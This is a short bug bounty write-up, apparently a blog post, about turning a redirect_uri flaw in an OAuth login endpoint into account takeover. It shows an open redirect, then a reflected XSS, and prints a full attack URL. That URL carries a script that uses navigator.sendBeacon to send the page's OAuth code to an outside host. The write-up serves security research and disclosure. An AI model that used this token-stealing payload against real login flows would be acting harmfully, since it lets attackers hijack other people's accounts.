.png)
4 years ago
173 BOOK THIS SPACE FOR AD
ARTICLE AD
This is the story about how I get a dupe (within a 24hs!) and get another (valid) vulnerability with the same impact.
The application used the Oauth mechanism to authenticate. The endpoint was like this:
https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]
After seeing that, I quickly changed redirect_uri parameter to my server and I saw how the application redirects me to my server… so at this point, I found an Open Redirect vulnerability on victim.com. Let’s get an Account Takeover vulnerability!
So, in my PoC, I made that the redirect_uri parameter point to my server and just that, because the Oauth code is sent in request too. So, that was easy. I made the report, send it and after 3 days I get the duplicated…
yes, I know what you are thinking, that was a very low hanging fruit, but… I needed to try, and that’s what this story is about, to keep trying!
I think a while how to do the same (Account Takeover) but with different techniques. And on my mind pop an idea like popup in XSS vulnerability ;-)
If I can explode an XSS vulnerability in that endpoint, maybe I can steal the Oauth token. And that is, I made the following PoC:
https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=https://www.victim.com/dashboard%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]
And it’s work!
But, what makes the difference between a simple JavaScript popup and ATO (Account TakeOver)? a cool payload, so let’s try to figure it out (thanks @mastersec !)
Final Payload:
navigator.sendBeacon(‘https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));
Final URL:
https://victim.com/auth?client_id=&nonce=[REDACTED]&redirect_uri=aaa”><script>navigator.sendBeacon(‘https://ssrftest.com/x/AAAAA',document.documentElement.innerHTML.split('code'));</script>&request=[TOKEN_REDACTED]&response_type=code&scope=openid+accounts&state=[REDACTED]
ssrftest.com is a site that allow to you to test for example, SSRF vulnerabilities.
And the result was the token submitted to the server that I control. WIN
I submitted the vulnerability and finally, after 2 days I got the triaged and the bounty $$$ :-)
So, always remember, KEEP TRYING!
I hope you enjoy this write up. Happy Hacking-Hunting
Hope you liked the post! If you would like to contact me, please visit https://www.cintainfinita.com or write to contact@cintainfinita.com.ar.
#BugBounty #BugBountyTips #Hacking
Bengali (Bangladesh) · 
English (United States) ·